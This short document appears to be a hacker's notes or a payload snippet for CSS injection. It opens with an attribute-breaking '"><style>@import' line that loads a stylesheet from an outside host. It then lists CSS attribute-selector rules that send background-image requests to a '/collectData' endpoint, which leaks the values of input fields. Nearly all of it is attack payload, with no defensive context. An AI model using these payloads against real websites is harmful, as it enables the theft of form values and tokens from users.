Hack. Eat. Sleep. Repeat!!!
"><style>@import'//host.com'</style>
<input value=1337>
<style>
input[value="1337"] {
--value: url(/collectData?value=1337);
}
input {
background:var(--value,none);
}
</style>
input[value$="a"] {
--value: url(/collectData?value=1337)
}
input {
background:var(--value,none);
}
input[value^="z"]{
color: red;
}
input[value$=a] {
--start-with-a: url(/collectData?data=a);
}
input {
background:var(--start-with-a,none);
}
div:has(input[value="1337"]) {
background:url(/collectData?value=1337);
}